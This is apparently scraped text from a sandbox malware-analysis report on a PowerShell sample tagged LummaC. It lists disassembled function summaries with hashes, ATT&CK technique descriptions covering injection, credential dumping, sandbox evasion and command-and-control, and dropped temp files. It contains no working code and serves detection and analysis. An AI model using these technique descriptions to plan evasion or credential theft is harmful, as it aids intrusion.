?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4 ref: 6BDECAA2
?free_helper@QHashData@@QAEXP6AXPAUNode@1@@Z@Z.QTCORE4(?), ref: 6BDECAB3

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: AtomicBasicData@@HashInt@@$?deref@?detach_helper2@?free_helper@Node@1@Node@1@@
String ID:
API String ID: 338300882-0
Opcode ID: bbf00e870d85b5fef18f2d5f66c17236c2e5613447ac30af744fff532dbf36fd
Instruction ID: ad66200cb3d4be1f4438c91986fbf9ba7286baa566b7cba8fa7ca4aa381b55b1
Opcode Fuzzy Hash: bbf00e870d85b5fef18f2d5f66c17236c2e5613447ac30af744fff532dbf36fd
Instruction Fuzzy Hash: F5E03074300210DBDB249FD4F858F587B75AFC6B1AF14045EE58297280DA711445DB64

Function 6C0C45D0 Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

??8QLineF@@QBE_NABV0@@Z.QTCORE4(?,?,?,?,?,?,?,?,?,?,6BC12F9A,00000000), ref: 6C0C45E8
?prepareGeometryChange@QGraphicsItem@@IAEXXZ.QTGUI4(?,?,?,?,?,?,?,?,?,6BC12F9A,00000000), ref: 6C0C45F4
??0QRectF@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,?,6BC12F9A,00000000), ref: 6C0C4604
?update@QGraphicsItem@@QAEXABVQRectF@@@Z.QTGUI4(00000000,?,?,?,?,?,?,?,?,6BC12F9A,00000000), ref: 6C0C460D

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: GraphicsItem@@Rect$?prepare?update@Change@F@@@GeometryLineV0@@
String ID:
API String ID: 381226308-0
Opcode ID: c654576b9002fbb2c0c90a1e3084f3b61613ef95092d793930aaa1abef2d8702
Instruction ID: 432b3176e6f5e73b737c0d3102fd567b60c8521cacb2a410fadd37af4258f07d
Opcode Fuzzy Hash: c654576b9002fbb2c0c90a1e3084f3b61613ef95092d793930aaa1abef2d8702
Instruction Fuzzy Hash: E8E092323001006BDB045A9898907EE73EAFFCD614F14853DF916A7381CA796C1D97A5

Function 6C0C4290 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

??8QBrush@@QBE_NABV0@@Z.QTGUI4(?,?,00000000), ref: 6C0C42A6
??4QBrush@@QAEAAV0@ABV0@@Z.QTGUI4(?,?,?,00000000), ref: 6C0C42B6

Part of subcall function 6BD0D3D0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,00000000,6C0C42BB,?,?,?,00000000), ref: 6BD0D3DE
Part of subcall function 6BD0D3D0: ?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,00000000), ref: 6BD0D3F4

??0QRectF@@QAE@XZ.QTCORE4(?,?,?,00000000), ref: 6C0C42BF
?update@QGraphicsItem@@QAEXABVQRectF@@@Z.QTGUI4(00000000,?,00000000), ref: 6C0C42C8

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: AtomicBasicBrush@@Int@@RectV0@@$?deref@?ref@?update@F@@@GraphicsItem@@
String ID:
API String ID: 2071456358-0
Opcode ID: cc24b2938c1e0e057ecc636b550ac4386d7feb5ff6e5c13db1267000997ba709
Instruction ID: d65ea12b9afd0ac04f7950c25d8f5fb16e040a96047c3a297d0e12c814311b43
Opcode Fuzzy Hash: cc24b2938c1e0e057ecc636b550ac4386d7feb5ff6e5c13db1267000997ba709
Instruction Fuzzy Hash: F0E092732100106BC3089B99D8C19EEF3ACFF9C624F04462AEA5553110AB657A1887B2

Function 6BC155A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

?offset@QGraphicsDropShadowEffect@@QBE?AVQPointF@@XZ.QTGUI4(?), ref: 6BC155AB

Part of subcall function 6C12CF80: ?offset@QPixmapDropShadowFilter@@QBE?AVQPointF@@XZ.QTGUI4(6BC154BC,?,6BC154BC), ref: 6C12CF8C

?x@QPointF@@QBENXZ.QTCORE4(?), ref: 6BC155B2
??0QPointF@@QAE@NN@Z.QTCORE4 ref: 6BC155CA
?setOffset@QGraphicsDropShadowEffect@@QAEXABVQPointF@@@Z.QTGUI4(00000000), ref: 6BC155D3

Part of subcall function 6C12CFA0: ?offset@QPixmapDropShadowFilter@@QBE?AVQPointF@@XZ.QTGUI4(?,?,?,?,?,?,?,6BC1551A,00000000), ref: 6C12CFB8
Part of subcall function 6C12CFA0: ?setOffset@QPixmapDropShadowFilter@@QAEXABVQPointF@@@Z.QTGUI4(?,?,?,?,?,6BC1551A,00000000), ref: 6C12CFCE
Part of subcall function 6C12CFA0: ?remove@QPixmapCache@@SAXABVKey@1@@Z.QTGUI4(?), ref: 6C12CFF9
Part of subcall function 6C12CFA0: ?offsetChanged@QGraphicsDropShadowEffect@@IAEXABVQPointF@@@Z.QTGUI4(?,?,?,?,?,?,6BC1551A,00000000), ref: 6C12D004

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Point$DropShadow$Pixmap$?offset@Effect@@F@@@Filter@@Graphics$?setOffset@$?offset?remove@Cache@@Changed@Key@1@@
String ID:
API String ID: 14257411-0
Opcode ID: c4c48dc71167c0a5efac205414c5c1a7a0d630ffb9462d2f6da0e1c8233d5b3d
Instruction ID: af74bf4a923d31f4d902e9cec708953d0fdc573865a99e72f1884f8ed199eb5f
Opcode Fuzzy Hash: c4c48dc71167c0a5efac205414c5c1a7a0d630ffb9462d2f6da0e1c8233d5b3d
Instruction Fuzzy Hash: 1AE04F31504210979714BBB895985AFBBA4FF8C608F404988E4D591244EE3486B887C6

Function 6BC15560 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

?offset@QGraphicsDropShadowEffect@@QBE?AVQPointF@@XZ.QTGUI4(?), ref: 6BC1556B

Part of subcall function 6C12CF80: ?offset@QPixmapDropShadowFilter@@QBE?AVQPointF@@XZ.QTGUI4(6BC154BC,?,6BC154BC), ref: 6C12CF8C

?y@QPointF@@QBENXZ.QTCORE4(?), ref: 6BC15572
??0QPointF@@QAE@NN@Z.QTCORE4 ref: 6BC1558A
?setOffset@QGraphicsDropShadowEffect@@QAEXABVQPointF@@@Z.QTGUI4(00000000), ref: 6BC15593

Part of subcall function 6C12CFA0: ?offset@QPixmapDropShadowFilter@@QBE?AVQPointF@@XZ.QTGUI4(?,?,?,?,?,?,?,6BC1551A,00000000), ref: 6C12CFB8
Part of subcall function 6C12CFA0: ?setOffset@QPixmapDropShadowFilter@@QAEXABVQPointF@@@Z.QTGUI4(?,?,?,?,?,6BC1551A,00000000), ref: 6C12CFCE
Part of subcall function 6C12CFA0: ?remove@QPixmapCache@@SAXABVKey@1@@Z.QTGUI4(?), ref: 6C12CFF9
Part of subcall function 6C12CFA0: ?offsetChanged@QGraphicsDropShadowEffect@@IAEXABVQPointF@@@Z.QTGUI4(?,?,?,?,?,?,6BC1551A,00000000), ref: 6C12D004

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Point$DropShadow$Pixmap$?offset@Effect@@F@@@Filter@@Graphics$?setOffset@$?offset?remove@Cache@@Changed@Key@1@@
String ID:
API String ID: 14257411-0
Opcode ID: 0be6ec705d43122b91a21bd226888657912771219f03a85cf784a62ff0e8e4ce
Instruction ID: d5ee9ca0986680adc1305d7f0d3816918d883c6013d616cf4a0a5b7b7f579dc5
Opcode Fuzzy Hash: 0be6ec705d43122b91a21bd226888657912771219f03a85cf784a62ff0e8e4ce
Instruction Fuzzy Hash: 81E04F3150411097D714BBB894585AFBBA4FF8C604F404988F4D681244DE3486B887C6

Function 6BC12770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18windowCOMMON

Download Yara Rule

APIs

?findActionForId@QMenu@@ABEPAVQAction@@H@Z.QTGUI4(?), ref: 6BC12775

Part of subcall function 6BF7FFB0: ?size@QListData@@QBEHXZ.QTCORE4(?,?,?,6BC1270D,?), ref: 6BF7FFC0
Part of subcall function 6BF7FFB0: ?at@QListData@@QBEPAPAXH@Z.QTCORE4(00000000,?,?,?,6BC1270D,?), ref: 6BF7FFD3
Part of subcall function 6BF7FFB0: ?size@QListData@@QBEHXZ.QTCORE4(?,?,?,6BC1270D,?), ref: 6BF7FFF4

?connect@QObject@@SA_NPBV1@PBD01W4ConnectionType@Qt@@@Z.QTCORE4(00000000,2activated(int),?,?,00000003,?), ref: 6BC12790

Strings

2activated(int), xrefs: 6BC1278A

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Data@@List$?size@$?at@?connect@?findActionAction@@ConnectionMenu@@Object@@Qt@@@Type@
String ID: 2activated(int)
API String ID: 1850593769-860165882
Opcode ID: 5b41108a3049775075b7bb255e3cbcd9e444116c4a76fb685ae843e103550f01
Instruction ID: e0e8448834518948e79dc76eab98d36aaa4e5e19bd5a3338244f813a54c3c73f
Opcode Fuzzy Hash: 5b41108a3049775075b7bb255e3cbcd9e444116c4a76fb685ae843e103550f01
Instruction Fuzzy Hash: 92D05EBA204300BBDA10DB70D959E5FB7A89FD1740F40C84DF54497241DA38DA10EA71

Function 6BC127B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON

Download Yara Rule

APIs

?findActionForId@QMenu@@ABEPAVQAction@@H@Z.QTGUI4(?), ref: 6BC127B5

Part of subcall function 6BF7FFB0: ?size@QListData@@QBEHXZ.QTCORE4(?,?,?,6BC1270D,?), ref: 6BF7FFC0
Part of subcall function 6BF7FFB0: ?at@QListData@@QBEPAPAXH@Z.QTCORE4(00000000,?,?,?,6BC1270D,?), ref: 6BF7FFD3
Part of subcall function 6BF7FFB0: ?size@QListData@@QBEHXZ.QTCORE4(?,?,?,6BC1270D,?), ref: 6BF7FFF4

?disconnect@QObject@@SA_NPBV1@PBD01@Z.QTCORE4(00000000,2triggered(),?,?,?), ref: 6BC127CE

Strings

2triggered(), xrefs: 6BC127C8

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Data@@List$?size@$?at@?disconnect@?findActionAction@@D01@Menu@@Object@@
String ID: 2triggered()
API String ID: 2156119724-3701311835
Opcode ID: aa625e35b3bd8f612b521a321233d2b54c8b26e97c32d90c7e25df65716ade59
Instruction ID: a643eb6d6b732dc87cf3fdacf1d714678c998ee2b4ec7647ac7b328d3325717b
Opcode Fuzzy Hash: aa625e35b3bd8f612b521a321233d2b54c8b26e97c32d90c7e25df65716ade59
Instruction Fuzzy Hash: 0BD05EBA204300BB9A009BB0C958C6FB7A8AFD1240F40C84DF81887601EA38D911DFB1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report IaslcsMo.txt.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\596c5d08

C:\Users\user\AppData\Local\Temp\PV4FLS06WTLN3UEUG7G.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bcb0yw4p.msi.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btgipqvy.3ow.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kud1n0yz.5tt.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnntxbro.phg.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opqkpmme.fxl.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r53zyiza.5hc.ps1

Windows Analysis Report
IaslcsMo.txt.ps1

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre